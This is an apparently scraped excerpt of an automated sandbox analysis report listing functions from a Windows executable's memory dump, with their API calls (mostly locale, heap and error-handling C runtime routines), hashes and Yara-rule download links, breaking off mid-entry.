Associated: 00000000.00000002.1490878647.00007FF7ABC8D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1490900932.00007FF7ABC91000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7abc00000_file.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5160664705158667e81bab6cdbde4881878e179a89be4c9fa1c4695460aa44ee
Instruction ID: bbf27d27c569ead24a5c27ce048fdd134fa4b202e55aa7c8c60799bd28311e29
Opcode Fuzzy Hash: 5160664705158667e81bab6cdbde4881878e179a89be4c9fa1c4695460aa44ee
Instruction Fuzzy Hash: D7510722B0568155FB10AB7AA890AAEBBA1FB447D4F455134EE5C77BB5CE3CD501C700

Function 00007FF7ABC64410 Relevance: 1.6, APIs: 1, Instructions: 70COMMON

Download Yara Rule

APIs

Part of subcall function 00007FF7ABC56F84: GetLastError.KERNEL32 ref: 00007FF7ABC56F93
Part of subcall function 00007FF7ABC56F84: FlsGetValue.KERNEL32 ref: 00007FF7ABC56FA8
Part of subcall function 00007FF7ABC56F84: SetLastError.KERNEL32 ref: 00007FF7ABC57033

Part of subcall function 00007FF7ABC56F84: FlsSetValue.KERNEL32 ref: 00007FF7ABC56FC9

GetLocaleInfoW.KERNEL32 ref: 00007FF7ABC64478

Memory Dump Source

Source File: 00000000.00000002.1490799711.00007FF7ABC01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7ABC00000, based on PE: true

Associated: 00000000.00000002.1490782544.00007FF7ABC00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1490854147.00007FF7ABC70000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1490878647.00007FF7ABC8D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1490900932.00007FF7ABC91000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7abc00000_file.jbxd

Similarity

API ID: ErrorLastValue$InfoLocale
String ID:
API String ID: 673564084-0
Opcode ID: 5a86f6551b3228d9c0916b14b2249d7917d42bd6171e235b69f918e9520d1485
Instruction ID: dc0a34cca39e9bfd3f1ebd6d4b4878da469150e122be829be568b6b8f0dcbea2
Opcode Fuzzy Hash: 5a86f6551b3228d9c0916b14b2249d7917d42bd6171e235b69f918e9520d1485
Instruction Fuzzy Hash: 8631EA31A0968287EB24EB29E462FBAB391FB48744F819135DA4D837B5EF3CE4118711

Function 00007FF7ABC64060 Relevance: 1.6, APIs: 1, Instructions: 61COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 00007FF7ABC56F84: GetLastError.KERNEL32 ref: 00007FF7ABC56F93
Part of subcall function 00007FF7ABC56F84: FlsGetValue.KERNEL32 ref: 00007FF7ABC56FA8
Part of subcall function 00007FF7ABC56F84: SetLastError.KERNEL32 ref: 00007FF7ABC57033

EnumSystemLocalesW.KERNEL32(?,?,?,00007FF7ABC6484F,?,00000000,00000092,?,?,00000000,?,00007FF7ABC54DC1), ref: 00007FF7ABC640FE

Memory Dump Source

Source File: 00000000.00000002.1490799711.00007FF7ABC01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7ABC00000, based on PE: true

Associated: 00000000.00000002.1490782544.00007FF7ABC00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1490854147.00007FF7ABC70000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1490878647.00007FF7ABC8D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1490900932.00007FF7ABC91000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7abc00000_file.jbxd

Similarity

API ID: ErrorLast$EnumLocalesSystemValue
String ID:
API String ID: 3029459697-0
Opcode ID: ef01aa4e10b798d8c1182b42df3aa6388aa70aed32a0fba372173c71e43b78bb
Instruction ID: 1c5a7263e927bee7267781eed240eb459a73c98da989c9d03e889f2548c9b368
Opcode Fuzzy Hash: ef01aa4e10b798d8c1182b42df3aa6388aa70aed32a0fba372173c71e43b78bb
Instruction Fuzzy Hash: 2F112467E09645CAEB10AF1AD490EBDB7A1FB54BA0F86A231C629433F0DE38D5D1C750

Function 00007FF7ABC64618 Relevance: 1.6, APIs: 1, Instructions: 52COMMON

Download Yara Rule

APIs

Part of subcall function 00007FF7ABC56F84: GetLastError.KERNEL32 ref: 00007FF7ABC56F93
Part of subcall function 00007FF7ABC56F84: FlsGetValue.KERNEL32 ref: 00007FF7ABC56FA8
Part of subcall function 00007FF7ABC56F84: SetLastError.KERNEL32 ref: 00007FF7ABC57033

GetLocaleInfoW.KERNEL32(?,?,?,00007FF7ABC643C2), ref: 00007FF7ABC6464F

Memory Dump Source

Source File: 00000000.00000002.1490799711.00007FF7ABC01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7ABC00000, based on PE: true

Associated: 00000000.00000002.1490782544.00007FF7ABC00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1490854147.00007FF7ABC70000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1490878647.00007FF7ABC8D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1490900932.00007FF7ABC91000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7abc00000_file.jbxd

Similarity

API ID: ErrorLast$InfoLocaleValue
String ID:
API String ID: 3796814847-0
Opcode ID: 67ccf32ae814a0d26bdbbaf8c5a0f09707bf70b588967180c96548bb5e4f4159
Instruction ID: 46c56dfcbed4dfec3b4f2ded0412178eddee2a9e7724f3949f65e1b467bfe467
Opcode Fuzzy Hash: 67ccf32ae814a0d26bdbbaf8c5a0f09707bf70b588967180c96548bb5e4f4159
Instruction Fuzzy Hash: 9F117A32F1955283E774AB29A060E7EB2E0EB68764F925231D62D437F0FE29D8818710

Function 00007FF7ABC64130 Relevance: 1.5, APIs: 1, Instructions: 41COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 00007FF7ABC56F84: GetLastError.KERNEL32 ref: 00007FF7ABC56F93
Part of subcall function 00007FF7ABC56F84: FlsGetValue.KERNEL32 ref: 00007FF7ABC56FA8
Part of subcall function 00007FF7ABC56F84: SetLastError.KERNEL32 ref: 00007FF7ABC57033

EnumSystemLocalesW.KERNEL32(?,?,?,00007FF7ABC6480B,?,00000000,00000092,?,?,00000000,?,00007FF7ABC54DC1), ref: 00007FF7ABC641AE

Memory Dump Source

Source File: 00000000.00000002.1490799711.00007FF7ABC01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7ABC00000, based on PE: true

Associated: 00000000.00000002.1490782544.00007FF7ABC00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1490854147.00007FF7ABC70000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1490878647.00007FF7ABC8D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1490900932.00007FF7ABC91000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7abc00000_file.jbxd

Similarity

API ID: ErrorLast$EnumLocalesSystemValue
String ID:
API String ID: 3029459697-0
Opcode ID: c556c0bea6b83112df6ab32f4da6f1a2c3745ef5e59afe02ddedd8d95d463359
Instruction ID: e9527739ae3ee7d354d75e07a65108931f3be07d7b7dc55af34454fdcdad6380
Opcode Fuzzy Hash: c556c0bea6b83112df6ab32f4da6f1a2c3745ef5e59afe02ddedd8d95d463359
Instruction Fuzzy Hash: 63012872F0928586E7106F19E851FB9B2E1EB547A4F82A331D239436F4EF3C94818711

Function 00007FF7ABC58874 Relevance: 1.5, APIs: 1, Instructions: 32COMMONLIBRARYCODE

Download Yara Rule

APIs

EnumSystemLocalesW.KERNEL32(?,?,00000000,00007FF7ABC58D1B,?,?,?,?,?,?,?,?,00000000,00007FF7ABC636B0), ref: 00007FF7ABC588C3

Memory Dump Source

Source File: 00000000.00000002.1490799711.00007FF7ABC01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7ABC00000, based on PE: true

Associated: 00000000.00000002.1490782544.00007FF7ABC00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1490854147.00007FF7ABC70000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1490878647.00007FF7ABC8D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1490900932.00007FF7ABC91000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7abc00000_file.jbxd

Similarity

API ID: EnumLocalesSystem
String ID:
API String ID: 2099609381-0
Opcode ID: 580ba48c80ce648dc1850835b2af7c4fe86649764c2b91a200ae029b4e583e33
Instruction ID: e83c908ba0ff2aab89b1aa4d33cf6c48b5b9d9bda9923dcb8f9d671319eacf59
Opcode Fuzzy Hash: 580ba48c80ce648dc1850835b2af7c4fe86649764c2b91a200ae029b4e583e33
Instruction Fuzzy Hash: 73F08172705B4183E700EB69F8809A9B3A2FB88B80F958135EA0E83374DE3CD961C350

Function 00007FF7ABC5A1C8 Relevance: 1.5, Strings: 1, Instructions: 254COMMON

Download Yara Rule

Strings

gfffffff, xrefs: 00007FF7ABC5A50A

Memory Dump Source

Source File: 00000000.00000002.1490799711.00007FF7ABC01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7ABC00000, based on PE: true

Associated: 00000000.00000002.1490782544.00007FF7ABC00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1490854147.00007FF7ABC70000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1490878647.00007FF7ABC8D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1490900932.00007FF7ABC91000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7abc00000_file.jbxd

Similarity

API ID:
String ID: gfffffff
API String ID: 0-1523873471
Opcode ID: 0f27753b35af301423d3a8abf2b7d21ce5d1fdb4b65858ed45011b93d0387abc
Instruction ID: b4f649a371ea4c2c8b7e35fa4f7a5b0d3c7bb9a999b09625c55cbacbc94968a1
Opcode Fuzzy Hash: 0f27753b35af301423d3a8abf2b7d21ce5d1fdb4b65858ed45011b93d0387abc
Instruction Fuzzy Hash: 70A16962A0A7C546EB21DF2AA040BBDBB91EB54B84F869231EE4D477B1DE3DE401C711

Function 00007FF7ABC4ACDC Relevance: 1.5, Strings: 1, Instructions: 241COMMON

Download Yara Rule

Strings

, xrefs: 00007FF7ABC4AEBE

Memory Dump Source

Source File: 00000000.00000002.1490799711.00007FF7ABC01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7ABC00000, based on PE: true

Associated: 00000000.00000002.1490782544.00007FF7ABC00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1490854147.00007FF7ABC70000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1490878647.00007FF7ABC8D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1490900932.00007FF7ABC91000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7abc00000_file.jbxd

Similarity

API ID:
String ID:
API String ID: 0-3916222277
Opcode ID: 45b205b7bf844638de4d5f403b2ffdc69b950a8dfccd93f16d3896cfea9d530a
Instruction ID: c142b42a86932d42a0dbcaad1f823c9c82659f9bad93c37579e34879d19e68fe
Opcode Fuzzy Hash: 45b205b7bf844638de4d5f403b2ffdc69b950a8dfccd93f16d3896cfea9d530a
Instruction Fuzzy Hash: C3B1B07290AB8185E7649F2DC05863CBBB2E745F48F660235EA4E473B5CF39D691C720

Function 00007FF7ABC5ED1C Relevance: 1.4, APIs: 1, Instructions: 137COMMON

Download Yara Rule

APIs

GetLastError.KERNEL32 ref: 00007FF7ABC5EDC1

Part of subcall function 00007FF7ABC587C4: HeapAlloc.KERNEL32(?,?,00000000,00007FF7ABC5715E,?,?,?,00007FF7ABC5167D,?,?,?,?,00007FF7ABC5A1B8,?,?,?), ref: 00007FF7ABC58819

Part of subcall function 00007FF7ABC58340: RtlFreeHeap.NTDLL(?,?,?,00007FF7ABC62B26,?,?,?,00007FF7ABC62EA3,?,?,00000000,00007FF7ABC633AD,?,?,?,00007FF7ABC632DF), ref: 00007FF7ABC58356
Part of subcall function 00007FF7ABC58340: GetLastError.KERNEL32(?,?,?,00007FF7ABC62B26,?,?,?,00007FF7ABC62EA3,?,?,00000000,00007FF7ABC633AD,?,?,?,00007FF7ABC632DF), ref: 00007FF7ABC58360

Part of subcall function 00007FF7ABC66E8C: _invalid_parameter_noinfo.LIBCMT ref: 00007FF7ABC66EBF

Memory Dump Source

Source File: 00000000.00000002.1490799711.00007FF7ABC01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7ABC00000, based on PE: true

Associated: 00000000.00000002.1490782544.00007FF7ABC00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1490854147.00007FF7ABC70000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1490878647.00007FF7ABC8D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1490900932.00007FF7ABC91000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7abc00000_file.jbxd

Similarity

API ID: ErrorHeapLast$AllocFree_invalid_parameter_noinfo
String ID:
API String ID: 916656526-0
Opcode ID: ecddaea97533682daabd926574219ac8eb77d9012c04aab06203c2af1d380149
Instruction ID: 71ec983367cfe10ad0c18aff90ab0c0c2e0e466d317391dd58623a48f09d4f11
Opcode Fuzzy Hash: ecddaea97533682daabd926574219ac8eb77d9012c04aab06203c2af1d380149
Instruction Fuzzy Hash: F4412721F5B34341EB60BF1A6491F7AE681AF95BC0F824635EE4D47BB5DE3CE0408220

Function 00007FF7ABC383A0 Relevance: 1.3, Strings: 1, Instructions: 89COMMON

Download Yara Rule

Strings

Value is not convertible to double., xrefs: 00007FF7ABC384CB

Memory Dump Source

Source File: 00000000.00000002.1490799711.00007FF7ABC01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7ABC00000, based on PE: true

Associated: 00000000.00000002.1490782544.00007FF7ABC00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1490854147.00007FF7ABC70000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1490878647.00007FF7ABC8D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1490900932.00007FF7ABC91000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7abc00000_file.jbxd

Similarity

API ID:
String ID: Value is not convertible to double.
API String ID: 0-3791697403
Opcode ID: 5ba565c77fdc33f98ca61690d12cdd307a771652d8fb550acc70161f8b7d49a6
Instruction ID: 8d61052960c2ee02cdfb60ef28844965f08e3b7b71b34656d8554a8312281063
Opcode Fuzzy Hash: 5ba565c77fdc33f98ca61690d12cdd307a771652d8fb550acc70161f8b7d49a6
Instruction Fuzzy Hash: A0310725E1988242FEA6F73CE0767B9D351BFCA700FD54032D64E16AB5EE2CE205CA10

Function 00007FF7ABC61EF8 Relevance: 1.3, APIs: 1, Instructions: 7memoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32 ref: 00007FF7ABC61EFC

Memory Dump Source

Source File: 00000000.00000002.1490799711.00007FF7ABC01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7ABC00000, based on PE: true

Associated: 00000000.00000002.1490782544.00007FF7ABC00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1490854147.00007FF7ABC70000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1490878647.00007FF7ABC8D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1490900932.00007FF7ABC91000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7abc00000_file.jbxd

Similarity

API ID: HeapProcess
String ID:
API String ID: 54951025-0
Opcode ID: 2b7369aa21f13457fdb80794d56569737c8fbd0d1e1785f4d2f6eb8c1f94b77e
Instruction ID: f1bd3445ba371cc42319086de681ea5753335aacbff849b3aa7752b3106d3d45
Opcode Fuzzy Hash: 2b7369aa21f13457fdb80794d56569737c8fbd0d1e1785f4d2f6eb8c1f94b77e
Instruction Fuzzy Hash: 0DB09220F07A06D2EA083B696C42B1462A47F48710FC68038C00D91330EF2C21E58B20

Function 00007FF7ABC4B1E4 Relevance: .3, Instructions: 327COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1490799711.00007FF7ABC01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7ABC00000, based on PE: true

Associated: 00000000.00000002.1490782544.00007FF7ABC00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1490854147.00007FF7ABC70000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1490878647.00007FF7ABC8D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1490900932.00007FF7ABC91000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7abc00000_file.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f12877a7773debabcfe14841abf0feb695a7b79a1a8abed41c0c36458b70f125
Instruction ID: 4b9a0118b4e0b8c12ec4466192fec595c2672bcbb0835f9856ce006ccef83d91
Opcode Fuzzy Hash: f12877a7773debabcfe14841abf0feb695a7b79a1a8abed41c0c36458b70f125
Instruction Fuzzy Hash: 18D11E22A0964282EB789F2D8158A7DB7A2EF45B48F961135CE0D076F6CF3EE645C350

Function 00007FF7ABC54C10 Relevance: .3, Instructions: 309COMMONLIBRARYCODE

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1490799711.00007FF7ABC01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7ABC00000, based on PE: true

Associated: 00000000.00000002.1490782544.00007FF7ABC00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1490854147.00007FF7ABC70000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1490878647.00007FF7ABC8D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1490900932.00007FF7ABC91000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7abc00000_file.jbxd

Similarity

API ID: ErrorLastNameTranslate$CodePageValidValue_invalid_parameter_noinfo
String ID:
API String ID: 4023145424-0
Opcode ID: f344d2a9087d21eca618563a8aa5b07c7537fb2cee8b4c4ba50660566b3eea24
Instruction ID: a630d4f908661259c205ddcd6dc6e8714c94f2e06ae93d31a3dfb5d7f3fa9dee
Opcode Fuzzy Hash: f344d2a9087d21eca618563a8aa5b07c7537fb2cee8b4c4ba50660566b3eea24
Instruction Fuzzy Hash: 73C10C25A4968245F760AB69D890BBAA7A0FF94788FC14231DE8D877F9DF3CD541C310

Function 00007FF7ABC4EAF8 Relevance: .3, Instructions: 287COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1490799711.00007FF7ABC01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7ABC00000, based on PE: true

Associated: 00000000.00000002.1490782544.00007FF7ABC00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1490854147.00007FF7ABC70000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1490878647.00007FF7ABC8D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1490900932.00007FF7ABC91000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7abc00000_file.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: cd06edce539a298007fbae6a2eff5b2dc8a17c3ec41319af2def5e4589d67cdd
Instruction ID: 64a7f22ae55b99bf3214b2c85c566a5db45f3d2add512e6177a0140d9d11213d
Opcode Fuzzy Hash: cd06edce539a298007fbae6a2eff5b2dc8a17c3ec41319af2def5e4589d67cdd
Instruction Fuzzy Hash: C2915932B1A24746FB2C6E2D9508BBAD692AF40784F870538DE5E477F0DD3CE6059728

Function 00007FF7ABC63774 Relevance: .3, Instructions: 271COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1490799711.00007FF7ABC01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7ABC00000, based on PE: true

Associated: 00000000.00000002.1490782544.00007FF7ABC00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1490854147.00007FF7ABC70000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1490878647.00007FF7ABC8D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1490900932.00007FF7ABC91000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7abc00000_file.jbxd

Similarity

API ID: ErrorLast$Value_invalid_parameter_noinfo
String ID:
API String ID: 1500699246-0
Opcode ID: 895bb8ed2e54a99e93314a1315de34fb1fdc1139edf3237d566104dcff8b7434
Instruction ID: 4fbac9e4714a55fde4ecd5d6d09334e48521afe42f395ee66c9df825effb4835
Opcode Fuzzy Hash: 895bb8ed2e54a99e93314a1315de34fb1fdc1139edf3237d566104dcff8b7434
Instruction Fuzzy Hash: C7B11B32A0968681E764BF2DD421EB9B3A0FBC8B48F815231DA59836F5DF3CE541C761

Function 00007FF7ABC52040 Relevance: .2, Instructions: 207COMMONLIBRARYCODE

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1490799711.00007FF7ABC01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7ABC00000, based on PE: true

Associated: 00000000.00000002.1490782544.00007FF7ABC00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1490854147.00007FF7ABC70000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1490878647.00007FF7ABC8D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1490900932.00007FF7ABC91000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7abc00000_file.jbxd

Similarity

API ID: _invalid_parameter_noinfo
String ID:
API String ID: 3215553584-0
Opcode ID: 06dee4fbac220f9cebe0ed687281eeebc667da011f0934cc1e0eb333a3493343
Instruction ID: 06ba3fbf37acdb011e7815d3845616dae496e3dd47348861d9ac0923e5b1201e
Opcode Fuzzy Hash: 06dee4fbac220f9cebe0ed687281eeebc667da011f0934cc1e0eb333a3493343
Instruction Fuzzy Hash: 5C81B372A06A0186EB64EE29D4C1B7D67A0FB84B94F814736DE1D977B4DF38D041C320

Function 00007FF7ABC5ACDC Relevance: .2, Instructions: 198COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1490799711.00007FF7ABC01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7ABC00000, based on PE: true

Associated: 00000000.00000002.1490782544.00007FF7ABC00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1490854147.00007FF7ABC70000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1490878647.00007FF7ABC8D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1490900932.00007FF7ABC91000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7abc00000_file.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: db771d61744b3cceb6fbab89a6039f45d1916131a150eaded8e8d11ce27dfc7d
Instruction ID: fa7054330b5fd9d9c32cf8d4d0fdf9ae8fc421107e06bf8bfe5116dde25456e3
Opcode Fuzzy Hash: db771d61744b3cceb6fbab89a6039f45d1916131a150eaded8e8d11ce27dfc7d
Instruction Fuzzy Hash: 3081D3B2A497C145E774EB1E94C0B7AAA90FB45B94F914335EA8E43BB5DE3CE4408B10

Function 00007FF7ABC5DAD4 Relevance: .2, Instructions: 183COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1490799711.00007FF7ABC01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7ABC00000, based on PE: true

Associated: 00000000.00000002.1490782544.00007FF7ABC00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1490854147.00007FF7ABC70000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1490878647.00007FF7ABC8D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1490900932.00007FF7ABC91000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7abc00000_file.jbxd

Similarity

API ID: _invalid_parameter_noinfo
String ID:
API String ID: 3215553584-0
Opcode ID: ebfe3d440fb28f2ae5af58a9e06a7af5b8c10f2a3410b4cc546c6d87b04cfe0b
Instruction ID: dbade05e60bc89d0c74ce23fd6e2c001c4b0c534d5e5b563b0a925ae093f91f4
Opcode Fuzzy Hash: ebfe3d440fb28f2ae5af58a9e06a7af5b8c10f2a3410b4cc546c6d87b04cfe0b
Instruction Fuzzy Hash: 53610B62F9E39246FB64AA2C84C0F79E6C1AF50760F960335DA5E427F1DE7DE8508720

Function 00007FF7ABC4A494 Relevance: .1, Instructions: 145COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1490799711.00007FF7ABC01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7ABC00000, based on PE: true

Associated: 00000000.00000002.1490782544.00007FF7ABC00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1490854147.00007FF7ABC70000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1490878647.00007FF7ABC8D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1490900932.00007FF7ABC91000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7abc00000_file.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 45278502b4de115ed76afef2690a2838d0b28876f14c66dd069eb4612fa83dd3
Instruction ID: ba3e79fab2976e36eb7b4bf40615a9d8c53f32456c0e88aa33cdb304517c464d
Opcode Fuzzy Hash: 45278502b4de115ed76afef2690a2838d0b28876f14c66dd069eb4612fa83dd3
Instruction Fuzzy Hash: B051F972A19A9182E7249B1CD00877CB3A2EB44F58F655131EE4D077B4CB3AED83CB50

Function 00007FF7ABC4A290 Relevance: .1, Instructions: 145COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1490799711.00007FF7ABC01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7ABC00000, based on PE: true

Associated: 00000000.00000002.1490782544.00007FF7ABC00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1490854147.00007FF7ABC70000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1490878647.00007FF7ABC8D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1490900932.00007FF7ABC91000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7abc00000_file.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ac8362b94cbf271fd23ce0d6965fdbbec26e6817efc2dd1af2fcdc0b4ee58872
Instruction ID: 2daa06a56a8a2b38b97384834f088d8abcdbf828401da49fa7c561e51e78fe3c
Opcode Fuzzy Hash: ac8362b94cbf271fd23ce0d6965fdbbec26e6817efc2dd1af2fcdc0b4ee58872
Instruction Fuzzy Hash: F651C732A1969186E7249B2DC04873CB7A2EB44F58F655131EE4C077B8DB3AED83C750

Function 00007FF7ABC4A698 Relevance: .1, Instructions: 145COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1490799711.00007FF7ABC01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7ABC00000, based on PE: true

Associated: 00000000.00000002.1490782544.00007FF7ABC00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1490854147.00007FF7ABC70000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1490878647.00007FF7ABC8D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1490900932.00007FF7ABC91000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7abc00000_file.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c9c3f90e6787dc6e65e60abd648d80575bcfa0207306300bab00d1ff848a11e7
